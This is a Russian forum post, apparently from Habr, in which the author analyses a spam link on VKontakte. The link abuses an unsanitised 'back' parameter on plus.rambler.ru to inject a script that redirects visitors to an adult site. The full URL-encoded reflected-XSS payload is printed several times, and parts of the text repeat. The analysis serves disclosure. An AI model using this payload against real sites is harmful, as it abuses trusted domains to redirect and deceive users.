Сегодня, прогуливаясь по страничкам Вконтакте, набрел на страничку одной «девушки» на которой она агитировала зайти на новый и классный сайт знакомств. Всё вроде бы обыденно и безынтересно если бы не ссылка. А ссылка была такой:
Далее начинается собственно выяснение. Те кто знаком с сайтом vkontakte.ru знает что этот сайт перед тем как перейти по внешней ссылке перекидывает пользователя на на страничку vkontakte.ru/away.php на которой предупреждает пользователя о том что переходить по внешней ссылке небезопасно. Таким образом нажав на ссылку мы попадаем на внутреннюю страничку Вконтакте где видим следующее:
А далее если декодировать эту ссылку из url_encode в utf то получаем нормальную ссылку:
Тут уже все более менее понятно. Например если зайти на http://plus.rambler.ru/login.html?back=habrahabr то в коде можно найти такую строчку:
То есть строчка
Для чего это сделано? Вопрос несложный скорее всего это сделано потому что Вконтакте отслеживает все внешние ссылки и чистит всякий спам но меня больше поражает красота подхода и еще больше поражает то что рамблер не удосужился сделать нормальную проверку внешних переменных.
На данный момент я не знаю влечет ли это за собой какие то серьезные уязвимости. Сейчас стараюсь это выяснить поэтому и написал этот хабратопик. Что скажете люди?
http://vkontakte.ru/away.php?to=http%3A%2F%2Fplus.rambler.ru%2Flogin.html%3Fback%3D%2522
%253E%253C%252Ftable%253E%253Cscript%253E
location.href%253D%2527http%2527%252B%2527
%253A%252F%252Frta%2527%252B%2527neta%2527
%252B%2527xxx%2527%252B%2527.ru%252F%253Fid
%2527%252B%2527ent%253D430%2527%252B%252749
%2527%253C%252Fscript%253E%253C%2521
Далее начинается собственно выяснение. Те кто знаком с сайтом vkontakte.ru знает что этот сайт перед тем как перейти по внешней ссылке перекидывает пользователя на на страничку vkontakte.ru/away.php на которой предупреждает пользователя о том что переходить по внешней ссылке небезопасно. Таким образом нажав на ссылку мы попадаем на внутреннюю страничку Вконтакте где видим следующее:
Вы покидаете сайт ВКонтакте.ру по внешней ссылке http://plus.rambler.ru/login.html?back=%22%3E%3C%2Ftable%3E%3Cscript%3Elocation.href%3D%27http
%27%2B%27%3A%2F%2Frta%27%2B%27neta%27%2B%27xxx%27%2B%27.ru%2F%3Fid%27%2B%27
ent%3D430%27%2B%2749%27%3C%2Fscript%3E%3C%21, предоставленной одним из участников. Администрация ВКонтакте.ру не несет ответственности за содержимое сайта plus.rambler.ru и настоятельно рекомендует не указывать никаких своих данных, имеющих отношение к ВКонтакте.ру (особенно e-mail, пароль и cookies), на сторонних сайтах.
Кроме того, сайт plus.rambler.ru может содержать вирусы, трояны и другие вредоносные программы, опасные для Вашего компьютера. Если у Вас нет серьезных оснований доверять этому сайту, лучше всего на него не переходить, даже если Вы якобы получили эту ссылку от одного из Ваших друзей.
Если Вы еще не передумали, нажмите на http://plus.rambler.ru/login.html?back=%22%3E%3C%2Ftable%3E%3Cscript%3Elocation.href%3D%27http
%27%2B%27%3A%2F%2Frta%27%2B%27neta%27%2B%27xxx%27%2B%27.ru%2F%3Fid%27%2B%27
ent%3D430%27%2B%2749%27%3C%2Fscript%3E%3C%21.
Если Вы не хотите рисковать безопасностью Вашего аккаунта и компьютера, нажмите отмена.
А далее если декодировать эту ссылку из url_encode в utf то получаем нормальную ссылку:
http://plus.rambler.ru/login.html?back=">
Тут уже все более менее понятно. Например если зайти на http://plus.rambler.ru/login.html?back=habrahabr то в коде можно найти такую строчку:
input type=«hidden» name=«back» value=«plus.rambler.ruhabrahabr»
То есть строчка
http://plus.rambler.ru/login.html?back=">просто внедряет в сайт plus.rambler.ru сторонний скрипт который перекидывает пользователя на сайт planetaxxx.
Для чего это сделано? Вопрос несложный скорее всего это сделано потому что Вконтакте отслеживает все внешние ссылки и чистит всякий спам но меня больше поражает красота подхода и еще больше поражает то что рамблер не удосужился сделать нормальную проверку внешних переменных.
На данный момент я не знаю влечет ли это за собой какие то серьезные уязвимости. Сейчас стараюсь это выяснить поэтому и написал этот хабратопик. Что скажете люди?
